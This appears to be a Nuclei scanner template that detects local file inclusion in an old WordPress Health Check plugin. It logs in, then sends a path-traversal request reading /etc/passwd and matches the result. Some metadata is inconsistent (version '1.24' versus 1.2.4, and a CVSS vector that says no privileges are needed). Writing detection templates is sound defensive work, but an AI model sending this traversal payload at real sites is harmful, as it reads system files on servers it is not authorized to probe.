id: health-check-lfi

info:
  name: WordPress Health Check & Troubleshooting <1.24 - Local File Inclusion
  author: DhiyaneshDK
  severity: high
  description: WordPress Health Check & Troubleshooting prior to 1.2.4 is vulnerable to local file inclusion. Exploitation does require authentication.
  remediation: Upgrade to version 1.2.4 or later.
  reference:
    - https://wpscan.com/vulnerability/5eecc4a7-0b44-495d-9352-78dccebfc72a
    - https://www.synacktiv.com/ressources/advisories/WordPress_Health_Check_1.2.3_Vulnerabilities.pdf
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: lfi,wp,wordpress,wp-plugin,authenticated,lfr,wpscan

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=health-check-view-file-diff&file=../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ebd6669cf9a2d05bfd81775015ccd292b64ce24241d82f8b18dccbcd7534c0db02204ee07ee1f2607d3ba9d1da94a8e87d814fe3658baae403d9cc90aca1e57682bb:922c64590222798bb761d5b6d8e72950